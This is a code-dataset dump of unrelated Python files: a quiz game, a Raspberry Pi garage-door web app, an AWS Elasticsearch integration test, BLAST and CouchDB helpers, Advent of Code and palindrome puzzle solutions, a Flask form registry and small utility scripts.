['a','b','c','d']\r\nelif len(lbr)>5:\r\n lpon = ['a','b']\r\nwhile 'KRAJ' not in odg:\r\n x = int(random.choice(lbr))\r\n print(lpit[x])\r\n odg = input()\r\n if odg in lodg[x] and odg not in 'KRAJ':\r\n to += 1\r\n elif odg not in lodg[x] and odg not in 'KRAJ':\r\n no += 1\r\n ln.append(x)\r\n lbr.remove(x)\r\n lpon.append(x)\r\n r = lpon.pop(0)\r\n if isinstance(r,int) == True:\r\n lbr.insert(r,r)\r\nfile.close\r\nprint('Točnih odgovora je bilo {}, a netočnih {}. 
Spremi igru (Y/N)?'.format(to,no))\r\ns = input()\r\nif s in 'Y':\r\n file = open(ime, 'a')\r\n file.write('\\n')\r\n for i in range(len(ln)):\r\n sbr = ln[i]\r\n save = lodg[sbr] + '-' + lpit[sbr] + '\\n'\r\n file.write(save)\r\nfile.close()\r\n","sub_path":"Golob_inf.py","file_name":"Golob_inf.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"543498041","text":"\"\"\"\nfound a bunch of info here:\nhttps://gist.github.com/johnwargo/ea5edc8516b24e0658784ae116628277\n\"\"\"\n\nimport sys\nimport gpiozero\nimport time\nfrom bottle import route, run, post, request, redirect\nfrom datetime import datetime\n\n\ndef logger(textMsg):\n \"\"\"Provides a consistent methond for writing log file.\"\"\"\n try:\n log = open(LOGFILE,\"a\")\n log.write(textMsg+\"\\n\")\n log.close()\n except:\n print(\"Very bad error writing to log file!!!\")\n\n\ndef set_relay(status):\n if status:\n print(\"Setting relay: ON\")\n relay.on()\n else:\n print(\"Setting relay: OFF\")\n relay.off()\n\n\ndef toggle_relay():\n \"\"\"Changes state of relay.\"\"\"\n print(\"toggling relay\")\n relay.toggle()\n\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n# What the user sees when they first arrive\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n@route('/', method=['GET', 'POST'])\ndef index():\n returnTxt = '''\n\n\n\t\n\t\t\n\t\n\t\n\t
<!-- NOTE: the original page markup was stripped during extraction; the minimal form below is a reconstructed placeholder, not the author's HTML -->\n\t<html>\n\t<head><title>Garage Door Opener</title></head>\n\t<body>\n\t<form action=\"/deploy\" method=\"post\">\n\t<button type=\"submit\">Open garage door</button>\n\t</form>\n\t</body>\n\t</html>
    \n\t\n'''\n return returnTxt\n\n\n@post('/deploy')\ndef deploy():\n ipaddr = request.environ['REMOTE_ADDR']\n now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n logstr = now + \" - Door trigger from \" + ipaddr\n logger(logstr)\n set_relay(True)\n time.sleep(.75)\n set_relay(False)\n redirect(\"/\")\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n# main program starts here... nothing really happens...\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n\ndef main():\n \"\"\"This program will present two buttons to the user. Each\n buton will open one of the garage doors.\n \"\"\"\n # change this value based on which GPIO port the relay is connected to\n # create a relay object.\n # Triggered by the output pin going low: active_high=False.\n # Initially off: initial_value=False\n now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n logger(now + \" - Program starting up.\")\n run(host='0.0.0.0', port=80, server=\"paste\")\n\n\nRELAY_PIN = 4\nLOGFILE = \"/var/log/garage.log\"\nrelay = gpiozero.OutputDevice(RELAY_PIN, active_high=False, initial_value=False)\n\nif __name__ == '__main__':\n ''' try:\n main()\n except:\n set_relay(False)\n print(\"\\nExiting application\")\n sys.exit(0)\n'''\n main()\n","sub_path":"garage.py","file_name":"garage.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"438079071","text":"# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You may\n# not use this file except in compliance with the License. A copy of the\n# License is located at\n#\n#\t http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. 
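The `/deploy` handler pulses the relay by hand (`on`, sleep, `off`). Wrapping the sleep in `try/finally` guarantees the relay is released even if the request thread dies mid-pulse; device construction is commented out because it only works on a Pi, and the pin number mirrors `RELAY_PIN` above:

```python
import time
import gpiozero

def pulse(relay, seconds=0.75):
    relay.on()
    try:
        time.sleep(seconds)
    finally:
        relay.off()  # never leave the door relay energized

# relay = gpiozero.OutputDevice(4, active_high=False, initial_value=False)
# pulse(relay)
```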
See the License for the specific language governing\n# permissions and limitations under the License.\n\n\"\"\"Integration tests for the ElasticsearchService API ElasticsearchDomain\nresource\n\"\"\"\n\nimport boto3\nimport datetime\nimport pytest\nimport logging\nimport time\nfrom typing import Dict\n\nfrom acktest.k8s import resource as k8s\n\nfrom e2e import service_marker, CRD_GROUP, CRD_VERSION, load_resource\nfrom e2e.replacement_values import REPLACEMENT_VALUES\n\nRESOURCE_PLURAL = 'elasticsearchdomains'\n\nDELETE_WAIT_AFTER_SECONDS = 20\nCREATE_INTERVAL_SLEEP_SECONDS = 15\n# Time to wait before we get to an expected RUNNING state.\n# In my experience, it regularly takes more than 6 minutes to create a\n# single-instance RabbitMQ broker...\nCREATE_TIMEOUT_SECONDS = 600\n\n\n@pytest.fixture(scope=\"module\")\ndef es_client():\n return boto3.client('es')\n\n\n# TODO(jaypipes): Move to k8s common library\ndef get_resource_arn(self, resource: Dict):\n assert 'ackResourceMetadata' in resource['status'] and \\\n 'arn' in resource['status']['ackResourceMetadata']\n return resource['status']['ackResourceMetadata']['arn']\n\n\n@service_marker\n@pytest.mark.canary\nclass TestDomain:\n def test_create_delete_7_9(self, es_client):\n resource_name = \"my-es-domain\"\n\n replacements = REPLACEMENT_VALUES.copy()\n replacements[\"DOMAIN_NAME\"] = resource_name\n\n resource_data = load_resource(\n \"domain_es7.9\",\n additional_replacements=replacements,\n )\n logging.error(resource_data)\n\n # Create the k8s resource\n ref = k8s.CustomResourceReference(\n CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,\n resource_name, namespace=\"default\",\n )\n k8s.create_custom_resource(ref, resource_data)\n cr = k8s.wait_resource_consumed_by_controller(ref)\n\n assert cr is not None\n assert k8s.get_resource_exists(ref)\n\n logging.info(cr)\n\n # Let's check that the domain appears in AES\n aws_res = es_client.describe_elasticsearch_domain(DomainName=resource_name)\n assert aws_res is not None\n\n now = datetime.datetime.now()\n timeout = now + datetime.timedelta(seconds=CREATE_TIMEOUT_SECONDS)\n\n # TODO(jaypipes): Move this into generic AWS-side waiter\n while aws_res['Created'] != True:\n if datetime.datetime.now() >= timeout:\n raise Exception(\"failed to find created ES Domain before timeout\")\n time.sleep(CREATE_INTERVAL_SLEEP_SECONDS)\n aws_res = es_client.describe_elasticsearch_domain(DomainName=resource_name)\n assert aws_res is not None\n\n # Delete the k8s resource on teardown of the module\n k8s.delete_custom_resource(ref)\n\n time.sleep(DELETE_WAIT_AFTER_SECONDS)\n\n # Domain should no longer appear in AES\n res_found = False\n try:\n es_client.describe_elasticsearch_domain(DomainName=resource_name)\n res_found = True\n except es_client.exceptions.NotFoundException:\n pass\n\n assert res_found is False\n","sub_path":"test/e2e/tests/test_elasticsearch_domain.py","file_name":"test_elasticsearch_domain.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"558615925","text":"from libraries.couchdb import Couchdb\nfrom flask import session\n\nimport json\n\nclass SearchModel(object):\n\tdef __init__(self):\n\t\tsuper(SearchModel, self).__init__()\n\t\tself.db = Couchdb('inventory')\n\n\tdef findSuppliers(self,q):\n\t\tobj = {\n\t\t\t'selector': {\n\t\t\t\t'$and':[\n\t\t\t\t\t{'user':session['_id']},\n\t\t\t\t\t{'doc_type':'supplier'},\n\t\t\t\t\t{'name': {'$lte':q} }\n\t\t\t\t]\n\t\t\t},\n\t\t\t'fields': ['name', 
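The create-wait loop in `test_create_delete_7_9` polls `describe_elasticsearch_domain` until the domain reports created or a deadline passes. The generic shape of that loop, factored into a helper; the commented usage assumes the boto3 response nests the flag under `DomainStatus`, unlike the flat `aws_res['Created']` access in the test:

```python
import datetime
import time

def wait_until(predicate, timeout_seconds, interval_seconds):
    deadline = datetime.datetime.now() + datetime.timedelta(seconds=timeout_seconds)
    while not predicate():
        if datetime.datetime.now() >= deadline:
            raise TimeoutError("condition not met before timeout")
        time.sleep(interval_seconds)

# wait_until(lambda: es_client.describe_elasticsearch_domain(
#     DomainName=name)['DomainStatus']['Created'], 600, 15)
```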
'_rev','_id'],\n\t\t}\n\n\t\tdata = self.db.find(obj)\n\n\t\treturn data\n\n\tdef findProducts(self,q):\n\t\tobj = {\n\t\t\t'selector': {\n\t\t\t\t'$and':[\n\t\t\t\t\t{'user':session['_id']},\n\t\t\t\t\t{'doc_type':'product'},\n\t\t\t\t\t{'name': {'$lte':q} }\n\t\t\t\t]\n\t\t\t},\n\t\t\t'fields': ['name', '_rev','_id'],\n\t\t}\n\n\t\tdata = self.db.find(obj)\n\n\t\treturn data","sub_path":"models/SearchModel.py","file_name":"SearchModel.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"231373667","text":"import subprocess as sp\nimport sys,os,time,re\nfrom collections import defaultdict\n\n\nclass Blast(object):\n\n \"\"\"\n Document this class\n \"\"\"\n\n def __init__(self,fasta_in,dbt,query,out = 'blastout.txt'):\n self.subject = fasta_in\n self.dbtype = dbt\n self.query = query\n self.outfile = out\n\n def makedb(self,force = False):\n \"\"\"Create a custom database from a multi-FASTA file of sequences with this minimal command:\n makeblastdb -in mydb.fsa dbtype nucl -parse_seqids\n subprocess.Popen requires a list of arguments\"\"\"\n print (\"Creating goddamn subject database...get stoked\")\n print (os.path.isfile(self.subject + \".nhr\") and os.path.isfile(self.subject + \".nin\") and os.path.isfile(self.subject + \".nsq\"))\n\n if (os.path.isfile(self.subject + \".nhr\") and os.path.isfile(self.subject + \".nin\") and os.path.isfile(self.subject + \".nsq\")) or force:\n return \"Database already exists continuing\"\n else:\n sp.Popen(['./ncbi-blast-2.9.0+/bin/makeblastdb','-in',self.subject,'-dbtype',self.dbtype]).wait()\n\n return \"Finished creating blastdb my guy\"\n\n def blast(self):\n \"\"\"\n\n Run blastn or blastp\n\n Parameters for -db and -query are provided by the class instance\n\n \"\"\"\n\n print(\"Running blast... 
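`Blast.makedb` and `Blast.blast` shell out with `sp.Popen([...]).wait()`, which silently ignores a non-zero exit status. `subprocess.run` with `check=True` is the modern equivalent and raises instead (binary path copied from the class above):

```python
import subprocess

def run_makeblastdb(fasta, dbtype="nucl"):
    subprocess.run(
        ["./ncbi-blast-2.9.0+/bin/makeblastdb", "-in", fasta, "-dbtype", dbtype],
        check=True,  # raise CalledProcessError on failure
    )
```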
OK dude, please chill\")\n start = time.time()\n\n #use blastn\n if self.dbtype == \"nucl\":\n \tsp.Popen(['./ncbi-blast-2.9.0+/bin/blastn','-db',self.subject,'-query',self.query,'-outfmt','7 stitle qstart sstart qend send qcovs qseqid','-out',self.outfile]).wait()\n #use blastp\n elif self.dbtype == \"prot\":\n sp.Popen(['./ncbi-blast-2.9.0+/bin/blastp','-db',self.subject,'-query',self.query,'-outfmt','7 stitle qstart sstart qend send qcovs qseqid','-out',self.outfile]).wait()\n\n end = time.time()\n\n return \"Done running blast in %0.6f seconds\" % (end - start)\n\nclass BlastReport(object):\n\n def __init__(self,blastresfile = 'blastout.txt'):\n self.file = blastresfile\n self.results = []\n self.parse() #call parse when new instance of the class is created\n\n def parse(self):\n find_query = re.compile(\"#\\sQuery:\\s.*\").search #regex\n pos = -1\n\n with open(self.file) as fh:\n for line in fh:\n if find_query(line):\n query = re.sub(\"#\\sQuery:\\s\",\"\",line)\n result_dict = defaultdict(defaultdict)\n self.results.append(result_dict)\n pos += 1\n elif line.startswith(\"#\"):\n continue\n else:\n line = line.split('\\t')\n self.results[pos][query][line[0]] = {'query_coords': line[1] + \":\" + line[3],\n 'subject_coords' : line[2] + \":\" + line[4],\n 'percent_query_coverage' : line[5] }\n print(self.results)\n\n def qcovs(self):\n #this takes the data that was parsed from the blast report and returns the percent query coverage\n qcov_list = []\n for result in self.results:\n for query in result:\n for subject in result[query]:\n qcov_list.append((query,subject,result[query][subject]['percent_query_coverage']))\n return qcov_list\n\ndef main():\n query = \"random.fna\" #this will be the file from dinucleotie program\n subject = \"./dbs/Actino_DB\" #I hard coded this path so change it to make it work, wilson changed\n dbt = \"nucl\"\n outfile = \"practice.out\" #random ass outfile name\n useblast = Blast(subject,dbt,query,outfile)\n useblast.makedb()\n useblast.blast()\n blast_results = BlastReport()\n\nif __name__ == '__main__':\n main()\n","sub_path":"blast.py","file_name":"blast.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"596899236","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 8 21:06:39 2020\n\n@author: laura\n\"\"\"\n\n#%% IMPORTS\nimport pandas as pd\nimport re\nimport regex as re2\n#%% DATA\ndata = []\nwith(open(\"Data - Day07.txt\", \"r\")) as file:\n for line in file:\n data.append(line.strip())\n\n#%% GOAL 1\n\"\"\"While snooping around the local network of EBHQ, you compile a list of IP addresses (they're IPv7, of course; IPv6 is much too limited). You'd like to figure out which IPs support TLS (transport-layer snooping).\n\nAn IP supports TLS if it has an Autonomous Bridge Bypass Annotation, or ABBA. An ABBA is any four-character sequence which consists of a pair of two different characters followed by the reverse of that pair, such as xyyx or abba. 
However, the IP also must not have an ABBA within any hypernet sequences, which are contained by square brackets.\"\"\"\n\n#%% SOLUTION 1\ndef SplitLines(line):\n lst = re.split(r'\\[|\\]', line)\n return lst[1::2], lst[::2]\n\ndef CheckABBA(string):\n return any(i != j for i, j in re2.findall(r'(.)(.)\\2\\1', string, overlapped=True))\n\nnum = 0\nfor i in data:\n inside, outside = SplitLines(i)\n if any(CheckABBA(j) for j in outside) and not any(CheckABBA(j) for j in inside):\n num += 1\n\nprint(num)\n\n#%% GOAL 2\n\"\"\"You would also like to know which IPs support SSL (super-secret listening).\n\nAn IP supports SSL if it has an Area-Broadcast Accessor, or ABA, anywhere in the supernet sequences (outside any square bracketed sections), and a corresponding Byte Allocation Block, or BAB, anywhere in the hypernet sequences. An ABA is any three-character sequence which consists of the same character twice with a different character between them, such as xyx or aba. A corresponding BAB is the same characters but in reversed positions: yxy and bab, respectively.\n\nHow many IPs in your puzzle input support SSL?\"\"\"\n\n#%% SOLUTION 2\ndef CheckABAandBAB(string):\n bab_aba = []\n for i,j in re2.findall(r'(.)(.)\\1', string, overlapped=True):\n if i != j:\n bab_aba.append(j+i+j)\n return bab_aba\n\n\ncount = 0\nfor line in data:\n inside, outside = SplitLines(line)\n babs = []\n for k in inside:\n for bab in CheckABAandBAB(k):\n babs.append(bab)\n\n lst = []\n for bab in babs:\n for m in outside:\n if bab in m:\n lst.append(True)\n\n if any(lst):\n count +=1\nprint(count)\n","sub_path":"Day07.py","file_name":"Day07.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"199235518","text":"from collections import defaultdict\n\nname = input()\nans = ''\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\ntmp = 0\n\ndic = defaultdict(int)\nfor c in name:\n dic[c] += 1\n\n#palindrome check\nif len(name) % 2 == 0: #글자수가 짝수인 경우\n val = dic.values()\n for x in val:\n if x % 2 == 1:\n ans = \"I'm Sorry Hansoo\"\n break\n\nelse: #글자수가 홀수인 경우\n val = dic.items()\n cnt = 0\n for k, v in val:\n if v % 2 == 1 and cnt == 0:\n cnt += 1\n tmp = k\n elif v % 2 == 1 and cnt > 0:\n ans = \"I'm Sorry Hansoo\"\n break\n\n#팰린드롬일때, 알파벳 개수를 돌면서 추출하기\nif len(ans) == 0:\n for x in alphabet:\n if dic[x]:\n ans += x * int(dic[x] // 2)\n ans2 = ans[::-1]\n if tmp: #홀수일경우\n ans += tmp\n ans += ans2\nprint(ans)\n","sub_path":"susie/BOJ/20220701_1213_팰린드롬만들기.py","file_name":"20220701_1213_팰린드롬만들기.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"343721336","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/3/29 下午2:06\n# @Author : yizhen\n# @Site : \n# @File : get_data.py\n# @Software: PyCharm\n\n# 得到不同条目的知识库,里面包含gold的知识库,用来测试条目的数据对最终结果的影响\n\nimport argparse\nimport random\n\nimport torch\nimport logging\nimport json\nimport codecs\n\ndef add_data(normal, navigate, num):\n \"\"\"\n\n :param normal:\n :param navigate:\n :param num:\n :return:\n \"\"\"\n count = 1\n items = normal['scenario']['kb']['items']\n navigate_item = navigate['scenario']['kb']['items'][0]\n\n for index, content in enumerate(items):\n if content['poi'] != navigate_item['poi'] and content['address'] != navigate_item['address']:\n navigate['scenario']['kb']['items'].append(content)\n count +=1\n if(count == num):\n return navigate\n 
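`CheckABBA` in the Day 7 solution relies on *overlapping* matches, which the stdlib `re` cannot produce; the third-party `regex` module's `overlapped=True` handles it, with backreferences `\2\1` mirroring the first pair:

```python
import regex

def has_abba(s):
    # (.)(.)\2\1 matches xyyx; the pair must use two different characters
    return any(a != b for a, b in regex.findall(r'(.)(.)\2\1', s, overlapped=True))

print(has_abba("ioxxoj"))  # True  ("oxxo")
print(has_abba("aaaa"))    # False (x == y is rejected)
```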
print(\"count:{0}\".format(count))\n return navigate\n\n\ndef process_data(args):\n \"\"\"\n return new data\n :param args:\n :return:\n \"\"\"\n res_navigate = []\n num = args.num # 代表要总共是几个数\n origin_navigate_path, origin_all_path, output_path = args.origin_navigate_path, args.origin_all_path, args.output_path\n with codecs.open(origin_navigate_path, 'r', encoding='utf-8') as fp_navigate:\n with codecs.open(origin_all_path, 'r', encoding = 'utf-8') as fp_all:\n navigate = json.loads(fp_navigate.read())\n all = json.loads(fp_all.read())\n # print(len(navigate))\n count = -1\n for index, content_origin in enumerate(all): # 从all入手\n res = []\n if content_origin['scenario']['task']['intent'] == 'navigate':\n count += 1\n res = add_data(content_origin, navigate[count], num)\n res_navigate.append(res)\n\n with codecs.open(output_path, 'w', encoding='utf-8') as fp_out:\n fp_out.write(json.dumps(res_navigate, indent=2))\n\n\ndef main():\n cmd = argparse.ArgumentParser(\"sentence_representation_library\")\n cmd.add_argument(\"--origin_navigate_path\", help='train data_path', type=str, default='./data/navigate_dev_public.json')\n cmd.add_argument(\"--origin_all_path\", help='train data_path', type=str,default='./data/kvret_dev_public.json')\n cmd.add_argument(\"--output_path\", help='train data_path', type=str,default='./data/origin_new_navigate_dev_public.json')\n cmd.add_argument(\"--num\", help='num', type=int,default='4')\n\n args = cmd.parse_args()\n process_data(args)\n\nif __name__ == '__main__':\n main()","sub_path":"scripts/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"602328163","text":"from exceptions import ValueError\nfrom operator import itemgetter\nfrom accelidsr.mod_idsrentry.models.idsr import Idsr\n\n_stepforms = {}\n\n\ndef registerStepForm(clazz, step, substep=1):\n \"\"\"\n Registers the Form to be dynamically loaded for a given step and substep.\n As an example, given a form with a name IdsrEntryStepA2Form, the value for\n the param 'step' would probably be 'A' and substep=2\n\n :param clazz: the type of the FlaskForm to to be instantiated\n :type clazz: type of FlaskForm\n :param step: the step for which the passed in type of form must be loaded\n :type step: string\n :param substep: the substep for which the passed in type of form and passed\n in step must be loaded\n :type substep: int\n \"\"\"\n idstep = step[0].lower()\n idsubstep = str(substep)\n if idstep not in _stepforms:\n _stepforms[idstep] = {'substeps': {}, 'title': step[1]}\n _stepforms[idstep]['substeps'][idsubstep] = clazz\n\n\ndef _getRegisteredStepForm(step, substep=1):\n \"\"\"\n Private function that returns the type of Form to be loaded when the passed\n in step and substep are requested\n\n :param step: the step for which the passed in type of form must be loaded\n :type step: string\n :param substep: the substep for which the passed in type of form and passed\n in step must be loaded\n :type substep: int\n :returns: the type of the Form to be loaded\n :rtype: type of FlaskForm\n \"\"\"\n substeps = _stepforms.get(step.lower(), {'substeps': {}})\n clazz = substeps['substeps'].get(str(substep), None)\n if clazz:\n return clazz\n raise ValueError(\"No form registered for step '{0}.{1}'\"\n .format(step, str(substep)))\n\n\ndef getStepIds(clazzname):\n \"\"\"\n Return a 2-tuple. 
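`registerStepForm` and `_getRegisteredStepForm` implement a class registry keyed by step and substep. The core of that pattern, reduced to a decorator; `FormA1` is a hypothetical stand-in for a FlaskForm subclass:

```python
_registry = {}

def register(step, substep=1):
    def decorate(cls):
        _registry[(step.lower(), str(substep))] = cls
        return cls
    return decorate

@register('a', 1)
class FormA1:
    pass

def new_form(step, substep=1):
    try:
        return _registry[(step.lower(), str(substep))]()
    except KeyError:
        raise ValueError("No form registered for step '%s.%s'" % (step, substep))

print(type(new_form('A')).__name__)  # FormA1
```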
The first item is the step and the second item is substep\n    associated to the passed in type name. If no type has been registered\n    previously for the passed in clazzname, raises a ValueError.\n\n    :param clazzname: the type of the form from which the 2-tuple with the step\n        and substep must be retrieved.\n    :type clazzname: the type of the Form to be loaded\n    :rtype: type of FlaskForm\n    \"\"\"\n    for k, v in _stepforms.items():\n        for y, z in v['substeps'].items():\n            if z.__name__ == clazzname:\n                return (k, y)\n    raise ValueError(\"No form registered for '{0}'\".format(clazzname))\n\n\ndef getAvailableSteps():\n    \"\"\"\n    Returns a list that contains all the available top-level steps registered\n    previously in the system through the function registerStepForm, sorted by\n    id ascending. E.g.: [{'id': 'a', 'title': ...}, {'id': 'b', 'title': ...}]\n\n    :returns: a list with the registered top-level steps, sorted by id asc\n    :rtype: A list of dicts with 'id' and 'title' keys\n    \"\"\"\n    steps = [{'id': k, 'title': v['title']} for k, v in _stepforms.items()]\n    sortedlist = sorted(steps, key=itemgetter('id'), reverse=False)\n    return sortedlist\n\n\ndef getAvailableSubsteps(step):\n    \"\"\"\n    Returns the substeps registered for the passed in step.\n    :param step: the step from which the substeps must be retrieved\n    :type step: string\n    :returns: the substeps associated to the passed in step, keyed by substep id\n    :rtype: A dict mapping substep ids to form types\n    \"\"\"\n    return _stepforms.get(step.lower(), {'substeps': {}})['substeps']\n\n\ndef getStepTitle(step):\n    \"\"\"\n    Returns the title associated to the passed in step\n    :param step: the step from which the associated title must be retrieved\n    :type step: string\n    :returns: The title associated to the passed in step\n    :rtype: string\n    \"\"\"\n    return _stepforms.get(step.lower(), {'title': ''}).get('title', '')\n\n\ndef getNextStepId(step, substep=None):\n    \"\"\"\n    Returns the next step (and/or substep) that follows the step (and substep)\n    passed in. If the substep passed in is the last substep from the step, the\n    function will return the first substep of the next available step, but only\n    if the passed in step is not the last step from within a sequence.\n    Otherwise, returns an empty string.\n    As an example, if step='b' and substep=2, the function will return 'b_3'. If\n    there is no substep 3 for b, then it will return 'c'. If, in turn, there is\n    no step 'c' registered, then it will return ''\n\n    :param step: the current step\n    :type step: string\n    :param substep: the current substep.\n    :type substep: int\n    :returns: The next step id that follows the current step and substep\n    :rtype: string\n    \"\"\"\n    if not step:\n        raise ValueError(\"No step passed in\")\n    substep = substep if substep else 1\n    substeps = getAvailableSubsteps(step)\n    if substeps:\n        sortedss = sorted(substeps.keys())\n        pos = [i for i, x in enumerate(sortedss) if x == str(substep)]\n        if pos and pos[0] < (len(sortedss) - 1):\n            return '{0}_{1}'.format(step.lower(), sortedss[pos[0] + 1])\n    # The substep passed in is the last one from the step. Return the first\n    # substep from the next top-level step\n    steps = [k['id'] for k in getAvailableSteps()]\n    pos = [i for i, x in enumerate(steps) if x == str(step)]\n    if pos and pos[0] < (len(steps) - 1):\n        return '{0}'.format(steps[pos[0]+1])\n    # We reached the end of the wizard form. No further step, return an empty\n    # string\n    return ''\n\n\ndef getPrevStepId(step, substep=None):\n    \"\"\"\n    Returns the previous step (and/or substep) before the step (and substep)\n    passed in. 
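(For illustration, assuming steps 'a' and 'b' each hold substeps 1 and 2,\n    getPrevStepId('b', 1) would return 'a_2'.) 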
If the substep passed in is the first substep from the step, the\n    function will return the last substep of the previous available step, but\n    only if the passed in step is not the first step from within a sequence.\n    Otherwise, returns an empty string.\n    As an example, if step='b' and substep=2, the function will return 'b_1'. If\n    step='a' and substep='1', then it will return ''\n\n    :param step: the current step\n    :type step: string\n    :param substep: the current substep.\n    :type substep: int\n    :returns: The previous step id before the current step and substep\n    :rtype: string\n    \"\"\"\n    if not step:\n        raise ValueError(\"No step passed in\")\n    if not substep:\n        substep = 1\n    substeps = getAvailableSubsteps(step)\n    if len(substeps) > 1:\n        sortedss = sorted(substeps.keys())\n        pos = [i for i, x in enumerate(sortedss) if x == str(substep)]\n        if pos and pos[0] > 0:\n            return '{0}_{1}'.format(step.lower(), sortedss[pos[0] - 1])\n    # The substep passed in is the first one from the step. Return the last\n    # substep from the previous top-level step\n    steps = [k['id'] for k in getAvailableSteps()]\n    pos = [i for i, x in enumerate(steps) if x == str(step)]\n    if pos and pos[0] > 0:\n        prevstep = steps[pos[0] - 1]\n        substeps = getAvailableSubsteps(prevstep)\n        if substeps:\n            sortedss = sorted(substeps.keys())\n            return '{0}_{1}'.format(prevstep, sortedss[-1:][0])\n        return '{0}'.format(prevstep)\n    # We reached the beginning of the wizard form. No previous step, return an\n    # empty string\n    return ''\n\n\ndef newStepFormInstance(step, substep=1):\n    \"\"\"\n    Returns an instance of the FlaskForm associated to the step and substep\n    passed in that were registered previously through the registerStepForm\n    function\n\n    :param step: the step associated to the form to be instantiated.\n    :type step: string\n    :param substep: the substep associated to the form to be instantiated\n    :type substep: int\n    :returns: The instance of the FlaskForm associated to the step and substep\n        passed in\n    :rtype: a FlaskForm object\n    \"\"\"\n    clazz = _getRegisteredStepForm(step, substep)\n    obj = clazz()\n    obj.initDefaults()\n    return obj\n\n\ndef loadStepFormInstance(requestform=None):\n    \"\"\"\n    Returns an instance of the FlaskForm associated to the step and substep\n    passed as parameters in the request form ('stepform' and 'substepform').\n    If the keys 'stepform' and 'substepform' are not found in the passed in\n    requestform, returns the instance associated to the first step (A.1)\n\n    :param requestform: the request form where the desired step and substep for\n        obtaining the FlaskForm to be instantiated are defined.\n    :returns: The instance of the FlaskForm associated to the step and substep\n        passed in via the requestform\n    :rtype: a FlaskForm object\n    \"\"\"\n    if requestform is None:\n        raise ValueError(\"No requestform object passed in\")\n    # By default, set A.1 as fallback\n    step = requestform.get('stepform', 'A')\n    substep = requestform.get('substepform', 1)\n    clazz = _getRegisteredStepForm(step, substep)\n    obj = clazz(requestform)\n    idobj = requestform.get('idobj', '')\n    if idobj:\n        idsrobj = Idsr.fetch(idobj)\n        idsrobj.update(requestform)\n        obj.setIdsrObject(idsrobj)\n    return obj\n\n\n# Import custom forms to be loaded dynamically here\nfrom accelidsr.mod_idsrentry.forms import a\nfrom accelidsr.mod_idsrentry.forms import b\nfrom accelidsr.mod_idsrentry.forms import c\nfrom accelidsr.mod_idsrentry.forms import 
d\n","sub_path":"accelidsr/mod_idsrentry/forms/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"573914109","text":"import sys\r\nfrom labjack import ljm\r\nimport sd_util\r\n\r\n\r\ndef usage():\r\n print('Usage: %s' % (sys.argv[0]))\r\n exit()\r\n\r\n\r\nif len(sys.argv) != 1:\r\n print('No arguments are allowed')\r\n usage()\r\n\r\nhandle = sd_util.openDevice()\r\nprint(sd_util.getCWD(handle))\r\nljm.close(handle)\r\n","sub_path":"Examples/More/SD/print_working_directory.py","file_name":"print_working_directory.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"293227717","text":"#coding: utf-8\nPETS = []\nFILENAME = 'pets.txt'\n\ntry:\n\twith open(FILENAME,'r',encoding=\"utf-8\") as fp:\n\t\tfor line in fp:\n\t\t\tinfo = line.split('/')\n\t\t\tID = info[0]\n\t\t\tname = info[1]\n\t\t\tcategory = info[2]\n\t\t\tprice = info[3]\n\t\t\tPETS.append({'id':ID,'name':name,'category':category,'price':price})\n\n\nexcept FileNotFoundError:\n\t# print(\"文件不存在!\")\n\tfp = open(FILENAME,'w',encoding='utf-8')\n\tfp.close()\n\ndef add_pet():\n\tID = input(\"请输入编号:\").strip()\n\tname = input(\"请输入宠物名称:\").strip()\n\tcategory = input(\"请输入宠物种类:\").strip()\n\tprice = input(\"请输入宠物价格\").strip()\n\tpet = {\"id\":ID,\"name\":name,\"category\":category,\"price\":price}\n\tPETS.append(pet)\n\tprint(\"宠物添加成功\")\n\ndef search_pet():\n\tname = input(\"请输入宠物名称:\").strip()\n\tfor pet in PETS:\n\t\tif pet['name'] == name:\n\t\t\ttext = 